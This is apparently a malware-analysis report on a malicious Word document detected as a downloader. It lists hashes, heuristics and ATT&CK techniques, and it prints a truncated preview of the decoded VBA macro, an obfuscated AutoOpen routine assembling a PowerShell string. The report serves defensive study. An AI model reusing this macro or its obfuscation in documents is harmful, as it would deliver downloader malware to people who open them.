Office (OLE) malware analysis — malicious · 670dd6b227d15e3d

MALICIOUS

Office (OLE)

652.5 KB Created: 2018-10-03 04:08:00 Authoring application: Microsoft Office Word First seen: 2019-03-10

MD5: f1faea2acde5d161fb9430d06787bbc5 SHA-1: bf8620b7bc4ddffbcfc3446bc8eec973f97efefe SHA-256: 670dd6b227d15e3dd636185e9a8a79ecf7371b42ba2ca30f0f70cc0221393b2d

250 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

This Office document contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. The AutoOpen macro is present and likely executes the malicious code upon opening. The ClamAV detection 'Doc.Downloader.Valyria-6704836-0' further confirms its malicious nature as a downloader. The VBA script is heavily obfuscated but its structure suggests it is designed to download and execute a second-stage payload.

Heuristics 8

ClamAV: Doc.Downloader.Valyria-6704836-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6704836-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 348340 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	348340 bytes
SHA-256: `736f575256590b704186152ed2f73c6237cb1f61aa0f4044d3edfa4c2919af7a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Function kker() MsgBox "warning" End Function Sub AutoOpen() Const iyiy = "a_yya" Const qmshlvpbj = "ecbwpay" Const iboopzwt = "ioghe" Const uxij94 = "hwazbdca" If 1050 < 2731 Then a_ylbgtw = "$yutclegzqoyby='m'') -re';$a_bqijbrubozugchzri" End If Const bore3 = "iuccao" Select Case "iievxj" Case 30892 Const jjeoqv = "xllmluy" Case "iievxj" mqifxscbknb = a_ylbgtw + oxnikpkk_st_sr Const ceuxpaq = "i_xmoxz_i" uppmyxkkf = "40='; $pce'" mqifxscbknb = mqifxscbknb + uppmyxkkf + ixhmvried End Select Const ydlajwi4 = "yao_uy20" Select Case "cxayocfkq92" Case "cxayocfkq92" ygqwheenhji = ";$pshrldvbprr_j_wdzgduwd='-" Const ikgvvi = "l_eukss" Const mrfhuck_ssk = "ztjmphg" Const rfoia = "iiock" Const ufceexe = "edey_aj29" mqifxscbknb = mqifxscbknb + ygqwheenhji + ghopxyp Case 29369 Const iuyeqm = "gtaogxu" Const ecefsy = "ykzwdzu4" Case 23715 Const qnzhok = "afmzm" Const bvnpuee = "eqvtrlau" End Select Const uizkl = "ouerqp" Select Case 77 - 52 Case urcarg Const pt_yfty58 = "opmu_lv" Const pyaejgv = "mqkjio" Case eejynkbxtv Const yuea = "chummeewp" Const awikl = "veypzc" Case 25 groy_n = mqifxscbknb fyspu3 = "Dat';$" Const jomae = "oyjqbj9" groy_n = groy_n + fyspu3 End Select Const uyett30 = "vhayivzw" Select Case "ogxuai_ir" Case "ogxuai_ir" axtk_ehnc2 = "uxxevdyblzdljevq" Const r_v_qrobi = "chwtiq" Const nhepkchh = "ofyyju" Const bwbvgo = "mnhei" Const qryplgm_ac = "tjpivhy" Const qbzui = "soyuo" groy_n = groy_n + axtk_ehnc2 End Select Const efkvmielq = "oseoi" Const oyknfo = "aftcyom" Const auprtpf = "oyyjxpm" If 4252 <= 5548 Then lzhhdke = bxrhkr + groy_n Const aue_s = "auia78" Const a_vyhux = "eyyo" lzhhdke = lzhhdke + "fxsrvoh" ElseIf 96 + 9 = 87 Then Const aexvvwi05 = "fpyp" Const ifsohr = "preehq" Const yeoe07 = "ihwio" Const uicmwvrfxc = "aygeq" Const ejapww = "ibodro04" Const ioy_i_hgi = "jgeeou" Const uooe = "ooejy3" Const e_kaldw = "dcdxpsz" Const ecgiofx = "c_yeoe" Const icehhi = "rointfzo" Const heqxrek = "ff_zesf" Const uskqelb = "olfmro" Const fweoaie7 = "oeaa" Const oy_y_x = "tiiq09" Else Const dbjoc = "xkuiouo" Const wtyogvp = "dfnlntoqf" Const ekttv0 = "aqelra" Const ynzaybu = "uuouj" End If Const wqgjw_fai = "oicrvhk" Select Case 43 - 44 Case -1 i_ziirce40 = lzhhdke + ooooi Const aqfvqu = "oyomy" qnkzrx = "wiyomlc='" Const rxkih = "ucxewjas" i_ziirce40 = i_ziirce40 + qnkzrx End Select Select Case "vrptyggevd" Case qqisyb Const zswxzcoq = "att_oy" Case eitiuyurv Const mfgkakvf = "arp_aaird0" Const mxpmwye = "hbfwlw" Case "vrptyggevd" obkhbmri_i_oa = cqufbiwy1 + i_ziirce40 + ixrggcsbnsbk Const yjmkmlcke = "pmoyshyqn" niaufs = "th;R';$ykwjcebwfva" obkhbmri_i_oa = eygc_qseo + obkhbmri_i_oa + niaufs + iyeiusx End Select Const hfgyq_a = "vazey" If 3719 > 1153 Then obkhbmri_i_oa = obkhbmri_i_oa + "_nwjiqjrzuouzbzey_ogahbss_e_" End If Const gelzke67 = "tnafcsp" Const angai1 = "yue_aa" Const eeszio = "yya_dy" Const apunv = "jmoaadwp" Select Case "uytiwgjuwj" Case 7721 Const uiqcio = "nsmpgxzfxcf" Const uabdo = "jqpmjircb" Case "uytiwgjuwj" obkhbmri_i_oa = obkhbmri_i_oa + "azf='ormat %s';$tboyaeudjq_" + ersvzuaa6 Case 2144 Const hmnl_ekto = "qoacv" End Select Const oizfafe8 = "atznsylw" Select Case 48 - 72 Case -24 nae_rlimku = hotvir + obkhbmri_i_oa + iddoyiie Const kv_qzjcw = "wuvvzyu" nae_rlimku = nae_rlimku + "ik" End Select Select Case "qonaftukx" Case 8665 Const yohzya = "iufrly" Const mhaxntuy = "wrlgwn" Const kiegqrhq01 = "yiube" Const phyatrv = "lappay" Const vzpfqjnl = "leqo_i" Case "qonaftukx" wgxnzrhgyyld = "qxdieey_hshbc_uujzg" Const ukuq = "gsmxji_a" Const oe_mxe = "alhcfmw_o" nae_rlimku = nae_rlimku + wgxnzrhgyyld + fcysyusmo End S ... (truncated)

SHA-256: 736f575256590b704186152ed2f73c6237cb1f61aa0f4044d3edfa4c2919af7a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function kker()
MsgBox "warning"
End Function
Sub AutoOpen()
Const iyiy = "a_yya"
Const qmshlvpbj = "ecbwpay"
Const iboopzwt = "ioghe"
Const uxij94 = "hwazbdca"

If 1050 < 2731 Then
a_ylbgtw = "$yutclegzqoyby='m'') -re';$a_bqijbrubozugchzri"
End If
Const bore3 = "iuccao"

Select Case "iievxj"
Case 30892
Const jjeoqv = "xllmluy"
Case "iievxj"
mqifxscbknb = a_ylbgtw + oxnikpkk_st_sr
Const ceuxpaq = "i_xmoxz_i"
uppmyxkkf = "40='; $pce'"
mqifxscbknb = mqifxscbknb + uppmyxkkf + ixhmvried
End Select
Const ydlajwi4 = "yao_uy20"

Select Case "cxayocfkq92"
Case "cxayocfkq92"
ygqwheenhji = ";$pshrldvbprr_j_wdzgduwd='-"
Const ikgvvi = "l_eukss"
Const mrfhuck_ssk = "ztjmphg"
Const rfoia = "iiock"
Const ufceexe = "edey_aj29"
mqifxscbknb = mqifxscbknb + ygqwheenhji + ghopxyp
Case 29369
Const iuyeqm = "gtaogxu"
Const ecefsy = "ykzwdzu4"
Case 23715
Const qnzhok = "afmzm"
Const bvnpuee = "eqvtrlau"
End Select
Const uizkl = "ouerqp"

Select Case 77 - 52
Case urcarg
Const pt_yfty58 = "opmu_lv"
Const pyaejgv = "mqkjio"
Case eejynkbxtv
Const yuea = "chummeewp"
Const awikl = "veypzc"
Case 25
groy_n = mqifxscbknb
fyspu3 = "Dat';$"
Const jomae = "oyjqbj9"
groy_n = groy_n + fyspu3
End Select
Const uyett30 = "vhayivzw"

Select Case "ogxuai_ir"
Case "ogxuai_ir"
axtk_ehnc2 = "uxxevdyblzdljevq"
Const r_v_qrobi = "chwtiq"
Const nhepkchh = "ofyyju"
Const bwbvgo = "mnhei"
Const qryplgm_ac = "tjpivhy"
Const qbzui = "soyuo"
groy_n = groy_n + axtk_ehnc2
End Select
Const efkvmielq = "oseoi"
Const oyknfo = "aftcyom"
Const auprtpf = "oyyjxpm"

If 4252 <= 5548 Then
lzhhdke = bxrhkr + groy_n
Const aue_s = "auia78"
Const a_vyhux = "eyyo"
lzhhdke = lzhhdke + "fxsrvoh"
ElseIf 96 + 9 = 87 Then
Const aexvvwi05 = "fpyp"
Const ifsohr = "preehq"
Const yeoe07 = "ihwio"
Const uicmwvrfxc = "aygeq"
Const ejapww = "ibodro04"
Const ioy_i_hgi = "jgeeou"
Const uooe = "ooejy3"
Const e_kaldw = "dcdxpsz"
Const ecgiofx = "c_yeoe"
Const icehhi = "rointfzo"
Const heqxrek = "ff_zesf"
Const uskqelb = "olfmro"
Const fweoaie7 = "oeaa"
Const oy_y_x = "tiiq09"
Else
Const dbjoc = "xkuiouo"
Const wtyogvp = "dfnlntoqf"
Const ekttv0 = "aqelra"
Const ynzaybu = "uuouj"
End If
Const wqgjw_fai = "oicrvhk"

Select Case 43 - 44
Case -1
i_ziirce40 = lzhhdke + ooooi
Const aqfvqu = "oyomy"
qnkzrx = "wiyomlc='"
Const rxkih = "ucxewjas"
i_ziirce40 = i_ziirce40 + qnkzrx
End Select
Select Case "vrptyggevd"
Case qqisyb
Const zswxzcoq = "att_oy"
Case eitiuyurv
Const mfgkakvf = "arp_aaird0"
Const mxpmwye = "hbfwlw"
Case "vrptyggevd"
obkhbmri_i_oa = cqufbiwy1 + i_ziirce40 + ixrggcsbnsbk
Const yjmkmlcke = "pmoyshyqn"
niaufs = "th;R';$ykwjcebwfva"
obkhbmri_i_oa = eygc_qseo + obkhbmri_i_oa + niaufs + iyeiusx
End Select
Const hfgyq_a = "vazey"

If 3719 > 1153 Then
obkhbmri_i_oa = obkhbmri_i_oa + "_nwjiqjrzuouzbzey_ogahbss_e_"
End If
Const gelzke67 = "tnafcsp"
Const angai1 = "yue_aa"
Const eeszio = "yya_dy"
Const apunv = "jmoaadwp"

Select Case "uytiwgjuwj"
Case 7721
Const uiqcio = "nsmpgxzfxcf"
Const uabdo = "jqpmjircb"
Case "uytiwgjuwj"
obkhbmri_i_oa = obkhbmri_i_oa + "azf='ormat %s';$tboyaeudjq_" + ersvzuaa6
Case 2144
Const hmnl_ekto = "qoacv"
End Select
Const oizfafe8 = "atznsylw"

Select Case 48 - 72
Case -24
nae_rlimku = hotvir + obkhbmri_i_oa + iddoyiie
Const kv_qzjcw = "wuvvzyu"
nae_rlimku = nae_rlimku + "ik"
End Select
Select Case "qonaftukx"
Case 8665
Const yohzya = "iufrly"
Const mhaxntuy = "wrlgwn"
Const kiegqrhq01 = "yiube"
Const phyatrv = "lappay"
Const vzpfqjnl = "leqo_i"
Case "qonaftukx"
wgxnzrhgyyld = "qxdieey_hshbc_uujzg"
Const ukuq = "gsmxji_a"
Const oe_mxe = "alhcfmw_o"
nae_rlimku = nae_rlimku + wgxnzrhgyyld + fcysyusmo
End S
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.